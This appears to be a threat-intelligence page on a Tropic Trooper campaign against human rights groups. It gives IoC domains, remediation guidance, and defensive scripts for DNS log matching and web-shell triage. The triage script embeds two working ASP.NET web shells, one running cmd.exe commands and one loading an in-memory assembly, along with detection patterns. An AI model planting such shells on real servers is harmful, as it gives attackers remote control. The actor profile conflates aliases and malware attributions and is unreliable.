Tropic Trooper's Silent Attack: A Destructive Cyber Campaign Against Human Rights Organizations


Tags: Tropic Trooper, Human Rights Under Attack, Umbraco, USBferry, Malware, PIRATE PANDA

Tropic Trooper is a long-running espionage and data-theft actor whose operations make it a significant threat to sensitive targets, including governments, military organizations and human rights defenders, particularly in the Asia-Pacific region. In the campaign described here, the group targeted human rights organizations and attempted to reach air-gapped systems using new web shells and USB-based malware.

Indicators of Compromise

techmersion.com
blog.techmersion.com
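The two domains above are only useful if they are actually checked against resolver logs, and a naive substring match will both miss subdomains and false-positive on lookalike names. The following is an added example (not part of the original page) that matches constructed DNS query lines against the listed IoCs: it normalizes case and the trailing dot that resolvers often log, treats any subdomain of an IoC apex as a hit, and aligns the suffix comparison on a label boundary so that a lookalike such as nottechmersion.com is not flagged. The log format and client IPs are assumptions.

```python
"""Match DNS query logs against the campaign's IoC domains.

Added example, not from the original page. Log lines and client IPs are
constructed; the IoC domains are the two listed on the page.
"""
from collections import defaultdict

IOC_DOMAINS = ["techmersion.com", "blog.techmersion.com"]

# Constructed sample in an assumed "<time> <client-ip> <qtype> <query-name>" layout.
DNS_LOG = """\
08:12:01 10.20.1.15 A blog.techmersion.com.
08:12:03 10.20.1.15 A BLOG.TECHMERSION.COM
08:13:44 10.20.1.22 A www.nottechmersion.com
08:14:09 10.20.1.31 A update.techmersion.com
08:15:00 10.20.1.40 A example.org
08:15:30 10.20.1.31 TXT techmersion.com
"""


def normalize(name: str) -> str:
    """Lower-case the name and strip the trailing dot many resolvers log."""
    return name.strip().rstrip(".").lower()


def matching_ioc(name: str, iocs=IOC_DOMAINS):
    """Return the most specific IoC covering `name`, or None.

    A name matches when it equals the IoC or ends with "." + IoC, so the
    comparison never crosses a label boundary (no hit on nottechmersion.com).
    """
    n = normalize(name)
    best = None
    for ioc in (normalize(i) for i in iocs):
        if n == ioc or n.endswith("." + ioc):
            if best is None or len(ioc) > len(best):
                best = ioc
    return best


def hunt(log_text: str, iocs=IOC_DOMAINS):
    """Return (client, query, ioc) for every log line whose query hits an IoC."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of aborting the sweep
        _, client, _, qname = parts
        ioc = matching_ioc(qname, iocs)
        if ioc:
            hits.append((client, normalize(qname), ioc))
    return hits


def clients_to_triage(hits):
    """Collapse hits into {client: sorted unique query names} for follow-up."""
    by_client = defaultdict(set)
    for client, qname, _ in hits:
        by_client[client].add(qname)
    return {c: sorted(q) for c, q in by_client.items()}


if __name__ == "__main__":
    for client, queries in clients_to_triage(hunt(DNS_LOG)).items():
        print(client, "->", ", ".join(queries))
```

Run it against a real export by replacing DNS_LOG with the file contents and adjusting the column split to your resolver's format; the hosts returned by clients_to_triage are the ones to pull for forensic review.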

APT Groups (1)

Pirate Panda

Summary of Actor: Pirate Panda, also known as APT 23, is a Chinese state-sponsored cyber espionage group. They have been active since at least 2009, primarily targeting entities in the defense, aerospace, and high-tech sectors.

General Features: Pirate Panda is known for its sophisticated spear-phishing campaigns and custom malware development. They often use zero-day exploits and are adept at maintaining long-term access to compromised networks. Their operations are typically aligned with Chinese political and economic interests.

Related Other Groups: APT10, APT1, Stone Panda

Indicators of Attack (IoA):
- Use of spear-phishing emails with malicious attachments
- Deployment of custom malware like IXESHE, Etumbot
- Use of compromised legitimate websites for watering hole attacks

Recent Activities and Trends:
- Latest Campaigns: Recent campaigns have involved targeting defense contractors with spear-phishing emails containing malicious document attachments. They've also been observed leveraging vulnerabilities in Microsoft Office and Adobe Flash Player to gain initial access.
- Emerging Trends: There is an increasing use of fileless malware techniques and advanced obfuscation methods to evade detection. Additionally, Pirate Panda has been seen aligning more closely with Chinese Belt and Road Initiative targets, suggesting a strategic pivot.

Aliases: APT 23, Earth Centaur, KeyBoy, Pirate Panda, Tropic Trooper, Bronze Hobart, Iron

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION

Technique ID | Technique Name | Remediation
T1071.001 | Application Layer Protocol: Web Protocols | Monitor outbound HTTP/HTTPS for anomalies (unknown destinations, odd User-Agent strings, regular beaconing intervals) and front exposed web servers with a web application firewall.
T1071.004 | Application Layer Protocol: DNS | Force all resolution through monitored internal resolvers, block direct outbound DNS and DNS-over-HTTPS from endpoints, and alert on queries for the IoC domains listed above.
T1119 | Automated Collection | Restrict removable media with device-control policy (allow-list by vendor and serial ID) and log USB insertions centrally; on air-gapped hosts, disable mass-storage drivers where they are not required.
T1020 | Automated Exfiltration | Deploy Data Loss Prevention (DLP), encrypt approved portable media, and alert on bulk file copies to removable drives.
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Forward Run/RunOnce key and Startup folder changes to the SIEM, baseline them, and audit deviations regularly.
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Restrict cmd.exe for standard users where feasible and log process creation with command lines (Windows Event 4688 or Sysmon Event 1) to detect anomalous invocations.
T1543.003 | Create or Modify System Process: Windows Service | Limit local administrator rights and alert on new or modified services (Event 7045 in the System log, 4697 in the Security log).
T1140 | Deobfuscate/Decode Files or Information | Alert on built-in decoders invoked by unexpected parent processes (for example certutil -decode or PowerShell FromBase64String) and detonate suspicious files with malware analysis tools.
T1573 | Encrypted Channel | Inspect TLS metadata (SNI, certificate issuer, client fingerprints) and terminate TLS at a proxy where policy allows, so C2 over encrypted channels is not invisible.
T1203 | Exploitation for Client Execution | Patch client applications (Office, browsers, PDF readers) promptly and monitor for exploitation attempts against known vulnerabilities.
T1564.001 | Hide Artifacts: Hidden Files and Directories | Use file integrity monitoring to detect newly created hidden files and directories, especially on removable media and in web roots.
T1566.001 | Phishing: Spearphishing Attachment | Train users on phishing tactics, filter attachments at the mail gateway, and detonate attachments in a sandbox before delivery.
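The remediation table covers the generic techniques, but the campaign's initial foothold was new web shells, and Umbraco (tagged above) runs on ASP.NET. The following is an added example, not code from the original page or from the vendor, showing how a responder can triage a web root for shell-like pages: each file is scored against a weighted list of indicators (command execution, request-driven reflection loading, base64 decoding) and anything over a threshold is reported, worst first. The indicator list, weights, threshold and the three sample pages are all assumptions to tune against your own deployment; a loader that never touches cmd.exe is deliberately included so the scan does not depend on a single pattern.

```python
"""Heuristic triage of an ASP.NET web root for web shells.

Added example, not from the original page. Indicators, weights, threshold
and the sample pages are constructed assumptions; tune them to your site.
"""
import re
import tempfile
from pathlib import Path

# (name, pattern, weight). Weights are an assumed starting point.
INDICATORS = [
    ("process_start", re.compile(r"\bProcess\.Start\b|ProcessStartInfo", re.I), 3),
    ("cmd_shell", re.compile(r"\bcmd(?:\.exe)?\b.{0,20}/c\b", re.I | re.S), 3),
    ("request_param", re.compile(r"\bRequest\s*(?:\.\w+)?\s*[\[(]\s*['\"][^'\"]+['\"]\s*[\])]"), 1),
    ("eval_dynamic", re.compile(r"\b(?:Eval|Execute|ExecuteGlobal)\s*\(", re.I), 2),
    ("reflection_load", re.compile(r"Assembly\.Load\s*\(|Activator\.CreateInstance", re.I), 2),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 1),
    ("file_write", re.compile(r"File\.WriteAll\w+|StreamWriter|FileStream", re.I), 1),
]
THRESHOLD = 4  # assumed; lower it for a noisier but more sensitive sweep
WEB_EXTS = {".aspx", ".ashx", ".asmx", ".asax", ".cshtml"}

# Constructed sample 1: classic command-execution shell.
COMMAND_SHELL = """<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object s, EventArgs e) {
    string c = Request["cmd"];
    if (c == null) return;
    var psi = new ProcessStartInfo("cmd.exe", "/c " + c);
    psi.RedirectStandardOutput = true; psi.UseShellExecute = false;
    var p = Process.Start(psi);
    Response.Write(p.StandardOutput.ReadToEnd());
}
</script>"""

# Constructed sample 2: loader that runs an attacker-supplied assembly in memory.
ASSEMBLY_LOADER = """<%@ WebHandler Language="C#" Class="Loader" %>
using System; using System.Web; using System.Reflection;
public class Loader : IHttpHandler {
    public void ProcessRequest(HttpContext ctx) {
        byte[] raw = Convert.FromBase64String(ctx.Request["d"]);
        Assembly.Load(raw).GetTypes()[0].GetMethod("Run").Invoke(null, new object[] { ctx });
    }
    public bool IsReusable { get { return false; } }
}"""

# Constructed sample 3: benign page that merely echoes an encoded parameter.
BENIGN_PAGE = """<%@ Page Language="C#" %>
<script runat="server">
void Page_Load(object s, EventArgs e) {
    string q = Request["q"] ?? "";
    Response.Write("<p>" + Server.HtmlEncode(q) + "</p>");
}
</script>"""


def score_source(text):
    """Return (score, [indicator names]) for one file's contents."""
    hits = [(name, w) for name, rx, w in INDICATORS if rx.search(text)]
    return sum(w for _, w in hits), [n for n, _ in hits]


def triage_webroot(root, threshold=THRESHOLD):
    """Scan `root` recursively; return [(relpath, score, names)] at or above threshold, worst first."""
    root = Path(root)
    findings = []
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in WEB_EXTS:
            score, names = score_source(p.read_text(encoding="utf-8", errors="replace"))
            if score >= threshold:
                findings.append((p.relative_to(root).as_posix(), score, names))
    return sorted(findings, key=lambda f: (-f[1], f[0]))


def demo():
    """Write the constructed samples into a temporary web root and triage it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for rel, body in [("default.aspx", BENIGN_PAGE),
                          ("media/upload.aspx", COMMAND_SHELL),
                          ("umbraco/loader.ashx", ASSEMBLY_LOADER)]:
            path = root / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body, encoding="utf-8")
        return triage_webroot(root)


if __name__ == "__main__":
    for rel, score, names in demo():
        print(f"{score:2d} {rel} {names}")
```

Point triage_webroot at the real site root (and at any upload or media directories the CMS writes to), then compare every finding against the deployment's known-good file list before escalating; a page that scores on request_param alone, like the benign sample, is expected on any dynamic site.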

Reports & References (1)

Observed Countries (20)

AE (238)
BH (425)
CN (782)
EG (336)
HK (321)
IL (703)
IQ (680)
IR (377)
JO (252)
KW (454)
LB (509)
OM (93)
PH (596)
PS (757)
QA (733)
SA (579)
SY (471)
TH (847)
TW (361)
YE (895)